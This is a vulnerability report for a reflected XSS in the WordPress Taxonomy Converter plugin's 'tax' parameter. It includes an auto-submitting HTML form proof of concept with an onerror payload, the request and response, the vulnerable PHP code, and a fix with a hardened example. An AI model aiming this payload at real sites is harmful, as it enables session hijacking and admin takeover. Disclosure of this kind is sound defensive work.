Reflected XSS: Taxonomy Converter via tax parameter
Severity: Medium
Program: WordPress
Reported by: foobar7
Vulnerability Details
---------------------
CVSS
----
Medium 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Description
-----------
The [Taxonomy Converter](https://wordpress.org/plugins/taxonomy-converter/) plugin, listed on the [Official WordPress plugins](https://profiles.wordpress.org/wordpressdotorg/#content-plugins) page, is vulnerable to reflected XSS because it echoes the `tax` query parameter into a link `href` without encoding it.
POC
----
```html
<html>
<body>
<form action="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2" method="POST" enctype="text/plain">
<input type="hidden" name="test" value="test " />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
Request
--------
```http
POST /wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2 HTTP/1.1
Host: 192.168.0.104
[...]

test=test
```

Response:

```http
HTTP/1.1 200 OK
[...]

<p>Uh, oh. Something didn’t work. Please <a href="admin.php?import=wptaxconvert&tax=categoryx\'\"><img src=x onerror=alert(1)>">try again</a>.</p>
```
Code
----
`/wp-content/plugins/taxonomy-converter/taxonomy-converter.php` (excerpt; `$tax` comes from the `tax` query parameter):

```php
function process($tax) {
    global $wpdb;
    if ( (!isset($_POST['terms_to_convert']) || !is_array($_POST['terms_to_convert'])) && empty($this->terms_to_convert) || (!isset($_POST['taxes'])) ) { ?>
        <div class="narrow">
        <p><?php printf(__('Uh, oh. Something didn’t work. Please <a href="%s">try again</a>.', 'wptaxconvert'), 'admin.php?import=wptaxconvert&tax='.$tax); ?></p>
        </div>
    <?php return;
    }
```
Solution
--------
Apply `esc_url` (or a comparable escaping function) to the URL built from `$tax` before passing it to `printf`, so that the value cannot break out of the `href` attribute.
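As an added illustration (not the plugin's code or the fix it shipped), the vulnerable link construction from `process()` next to a hardened version that percent-encodes the query value and entity-encodes the attribute. It uses only PHP builtins so it runs with the PHP CLI outside WordPress; inside WordPress the equivalent is `esc_url( add_query_arg( 'tax', $tax, 'admin.php?import=wptaxconvert' ) )`. The sample `$tax` value is the PoC payload after URL decoding.

```php
<?php
// Added example, not code from the Taxonomy Converter plugin.
// Constructed sample input: the decoded `tax` value from the PoC request above.
$tax = "categoryx'\"><img src=x onerror=alert(1)>";

// Vulnerable pattern (mirrors the plugin): the raw value is concatenated into
// a URL that is then printed inside an href attribute.
function vulnerable_retry_link(string $tax): string {
    $url = 'admin.php?import=wptaxconvert&tax=' . $tax;
    return sprintf('<a href="%s">try again</a>', $url);
}

// Hardened pattern: two contexts, two encodings.
//  1. rawurlencode() makes the value a safe query-string component
//     (' " < > & and spaces all become %XX sequences).
//  2. htmlspecialchars() with ENT_QUOTES encodes the finished URL for the
//     attribute context (the literal & between parameters becomes &amp;).
// In WordPress, add_query_arg() + esc_url() perform the same two steps.
function safe_retry_link(string $tax): string {
    $url = 'admin.php?import=wptaxconvert&tax=' . rawurlencode($tax);
    return sprintf('<a href="%s">try again</a>', htmlspecialchars($url, ENT_QUOTES, 'UTF-8'));
}

// Defender-side check: the markup must contain exactly the two tags we wrote
// (<a ...> and </a>); any additional '<' means the value injected a new tag.
function link_markup_intact(string $html): bool {
    return substr_count($html, '<') === 2;
}

echo vulnerable_retry_link($tax), PHP_EOL;
echo safe_retry_link($tax), PHP_EOL;
var_dump(link_markup_intact(vulnerable_retry_link($tax)));
var_dump(link_markup_intact(safe_retry_link($tax)));
```

Running the script prints the injected `<img>` tag for the vulnerable variant and a single percent-encoded `href` for the hardened one; the intact check is false for the first and true for the second.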
Impact
------
With a successful attack, an attacker can access all data the attacked user has access to and perform arbitrary requests on behalf of that user.
If the attacked user is an administrator, the attacker could, for example, create a new admin user and thus gain full control of the application (and, depending on the configuration, the server).
Report Details
--------------
State: Closed
Substate: Resolved
Weakness: Cross-site Scripting (XSS) - Reflected